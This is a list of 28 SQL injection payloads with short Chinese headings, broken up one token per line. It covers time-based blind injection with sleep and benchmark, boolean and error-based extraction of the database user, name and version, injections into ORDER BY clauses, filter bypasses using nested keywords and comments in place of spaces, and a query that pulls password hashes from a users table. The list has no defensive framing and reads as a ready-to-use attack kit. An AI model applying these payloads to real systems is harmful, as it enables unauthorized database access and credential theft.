1、注入点在order by后面,order by desc
-
desc
,
if
(
strcmp
(
substr
(
user
(),
1
,
14
),
char
(
114
,
111
,
111
,
116
,
64
,
108
,
111
,
99
,
97
,
108
,
104
,
111
,
115
,
116
)),
refreshtime
,
click
)
limit
1
#
2、
-
and
left
(
database
(),
1
)=
char
(
71
)
3、延时注入
-
'+benchmark(20000000,sha1(1))+'
-
'+benchmark(20000000,MD5(1))+'
4、用(替换空格
-
'XOR(if((select '
test
')='
test
',sleep(2),0))OR'
5、
-
case when
1
=
1
and
len
(
system_user
)=
6
then
0
else
2
/
0
end
6、
-
(
select
(
0
)
from
(
select
(
sleep
(
abs
(
ascii
(
mid
(
lower
(
user
()),
9
,
1
))-
115
))))
v
)#
7、
-
(
SELECT
+(
CASE
+
WHEN
+(
3373
=
3373
)+
THEN
+(
21
+
and
+
1
=
1
)+
ELSE
+
1
/(
SELECT
+
0
)+
END
))
and
1
=
1
8、
-
ascii
(
substring
(@
@version
,
1
,
1
))
9、
-
ascii
(
substr
(@
@version
,
1
,
1
))
10、
-
city_ID
=
1
-
if
((
1
=
1
),
1
,(
select
1
union select
2
))
11、
-
select group_concat
(
passwd
)
from
activity_manage
.
users limit
10
offset
0
)
a
12、
-
(
select
*
from
(
select
*
from
func a join func b using
(
name
,
ret
))
as
c
)
13、
-
)
or
if
(
ascii
(
mid
(
user
(),
1
,
1
))
rlike
(
115
),
sleep
(
1
%
2f10
),
1
)%
23
14、
-
' and (select * from (select(sleep(abs(ascii(mid(lower(user()) from %s for 1))-%s))))aaa) and '
d
'='
d
15、
-
ELT
((
ASCII
(
SUBSTR
(
user
(),
1
,
1
)))>
109
,
SLEEP
(
2
))
16、
-
(
select
!
x
-~
0.FROM
(
select
+(
select user
())
x
)
f
)--+
17、
-
%
27
%
20or
%
202
=
if
((
1
=
1
*
),
1
,(
select
%
201
%
20from
%
20information
_schema
.
tables
))%
20and
%
20
%
27
%
27
-
' or 2=if((1=1 * ),1,(select 1 from information_schema.tables)) and ''
-
' || 2=if((1=1 * ),1,(select 1 from information_schema.tables)) xor '
18、
-
9
AND database
()
like
0x
'+temp_database+str(hex(i))[2:]+'
25
19、
-
if
(
GREATEST
(
ASCII
(
MID
((
DATABASE
()),
21
,
1
)),
121
+
1
)=
ASCII
(
MID
((
DATABASE
()),
21
,
1
)),
benchmark
(
2000000
,
encode
(
'hello'
,
'goodbye'
)),
0
)
20、
-
left
(
data
,
1
)
-
reverse
(
right
(
reverse
(
data
),
1
))
21、
-
1'xorif(now()=sysdate(),sleep(),0)xor'
1
22、
-
'+(select(0)from(select(sleep(3)))v)+'
23、
-
)
and
length
(
user
())=
23
and
(
1
=
1
24、
-
(
select
*
from
(
select
(
sleep
(
5
)))
x
)
-
(select * from (select (substring(version(),1,1)=5))x) 用一个确定的值
25、
-
%27/**/and/**/%28seleselectct/**/1/**/from/**/%28selselectect/**/count%28*%29,concat%280x7e,user%28%29,0x7e,floor%28rand%280%29*2%29%29x/**/from/**/information_schema.tables/**/group/**/by/**/x%29a%29%23_
26、
-
720' AND (SELECT * FROM (SELECT(case when (length(user())=23) then sleep(2) else sleep(0) end))lzRG) AND 'IgTp'='IgTp
27、
-
order by desc rlike case when
(
ascii
(
mid
(
database
()
from
(
'+str(i)+'
)
for
(
1
)))=
'+str(j)+'
)
then
1
else
char
(
40
)
end
28、
-
ordertype
=
desc
,(
select
*
from
(
select
(
if
(
ascii
(
substr
(
version
(),
1
,
1
))=
53
,
sleep
(
0
),
1
)))
a
)